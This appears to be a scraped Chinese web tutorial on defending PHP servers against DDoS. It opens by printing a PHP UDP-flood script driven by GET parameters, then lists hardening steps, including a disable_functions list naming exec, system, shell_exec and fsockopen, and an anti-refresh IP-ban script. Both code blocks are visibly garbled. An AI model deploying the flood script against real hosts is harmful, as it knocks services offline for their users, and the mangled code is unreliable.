php ddos是一种利用服务器就是利用我服务器的php.ini中配置allow_url_fopen = on才得成了,但allow_url_fopen 这个功能很多网站都需要使用,下面我来给大家介绍一些关于php ddos的几个防御方法
我们先来看php ddos代码
代码如下 复制代码
$packets = 0;
$ip = $_get['ip'];
$rand = $_get['port'];
set_time_limit(0);
ignore_user_abort(false);
$exec_time = $_get['time'];
$time = time();
print flooded: $ip on port $rand
;
$max_time = $time+$exec_time;
for($i=0;$i$out .= x;
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(udp://$ip, $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo packet complete at .time('h:i:s'). with $packets ( . round(($packets*65)/1024, 2) . mb) packets averaging . round($packets/$exec_time, 2) . packets/s n;
?>
细心的朋友会发现fsockopen是一个主要攻击函数了,不断连接发送请求导致机器流量与cpu过多从而网站不对正常访问了。
于是简单的研究了一下php ddos脚本构造,并有所收获,下面介绍几点可以最大程度避免的方法:
注意:以下操作具有危险性,对于造成的任何后果,与傲游无关,请谨慎操作。
1.打开php.ini
2.禁用危险函数
由于程序不同,函数要求也不同,所以请客户自行增删需要禁用的函数。
找到disable_functions,将前面的“;”去掉,在等号后面增加:
代码如下 复制代码
phpinfo,passthru,exec,system,popen,chroot,escapeshellcmd,escapeshellarg,shell_exec,proc_open,
proc_get_status,fsocket,fsockopen
3.设置php执行超时时间
如果程序未执行结束但已经达到最大执行时间,则会被强制停止,请根据需要调整时间。
找到max_execution_time,将前面的“;”去掉,在等号后面增加正整数,单位为秒,如:30
4.禁用上传目录php执行权限
大概分为三种服务器: iis,apache、nginx,具体步骤就不写了,放出个链接供大家参考:
iis与apache取消目录脚本执行权限方法:http://www.bkjia.c0m/sys/windows/46232.htm
5.一个很暴力的方法
直接禁止php执行,原因是很多站点都可以生成静态网页的,每次生成或者管理都去手工打开php执行权限,现在已经有几个用户使用这种方法了,具体方法参见方法4
6.关闭用户中心
比如dede等cms都会有用户中心,里面有很多上传的地方,这就是大概的问题所在。
7.修改管理员目录
这个方法就不细谈了,并不是对所有程序都适合。
8.修改默认管理帐号
很多人都习惯使用:admin 但是如果程序出现漏洞,很容易被猜测出admin的密码,所以建议修改admin为其他登录名。
9.一个复杂且记得住的密码
不管是windows/linux的系统用户还是网站管理员的账户,都需要设置一个难以猜解的密码,如:123hai@tang@.
后再再附一个php防ddos攻击的代码
代码如下 复制代码
60)unlink($fileforbid);
else{
$fileforbidarr=@file($fileforbid);
if($ip==substr($fileforbidarr[0],0,strlen($ip)))
{
if($time-substr($fileforbidarr[1],0,strlen($time))>600)unlink($fileforbid);
elseif($fileforbidarr[2]>600){file_put_contents($fileht,$ip.rn,file_append);unlink($fileforbid);}
else{$fileforbidarr[2]++;file_put_contents($fileforbid,$fileforbidarr);}
}
}
}
//防刷新
$str=;
$file=log/ipdate.dat;
if(!file_exists(log)&&!is_dir(log))mkdir(log,0777);
if(!file_exists($file))file_put_contents($file,);
$allowtime = 120;//防刷新时间
$allownum=10;//防刷新次数
$uri=$_server['request_uri'];
$checkip=md5($ip);
$checkuri=md5($uri);
$yesno=true;
$ipdate=@file($file);
foreach($ipdate as $k=>$v)
{ $iptem=substr($v,0,32);
$uritem=substr($v,32,32);
$timetem=substr($v,64,10);
$numtem=substr($v,74);
if($time-$timetemif($iptem!=$checkip)$str.=$v;
else{
$yesno=false;
if($uritem!=$checkuri)$str.=$iptem.$checkuri.$time.1rn;
elseif($numtemelse
{
if(!file_exists($fileforbid)){$addforbidarr=array($ip.rn,time().rn,1);file_put_contents($fileforbid,$addforbidarr);}
file_put_contents(log/forbided_ip.log,$ip.--.date(y-m-d h:i:s,time()).--.$uri.rn,file_append);
$timepass=$timetem+$allowtime-$time;
die(warning:.
.sorry,you are forbided by refreshing frequently too much, pls wait for .$timepass. seconds to continue!);
}
}
}
}
if($yesno) $str.=$checkip.$checkuri.$time.1rn;
file_put_contents($file,$str);
?>
相关教程 :
iis防止php ddos占完网络带宽与服务器资源解决方法
http://www.bkjia.com/phpjc/632837.htmlwww.bkjia.comtruehttp://www.bkjia.com/phpjc/632837.htmltecharticlephp ddos是一种利用服务器就是利用我服务器的php.ini中配置allow_url_fopen = on才得成了,但allow_url_fopen 这个功能很多网站都需要使用,下面我来...
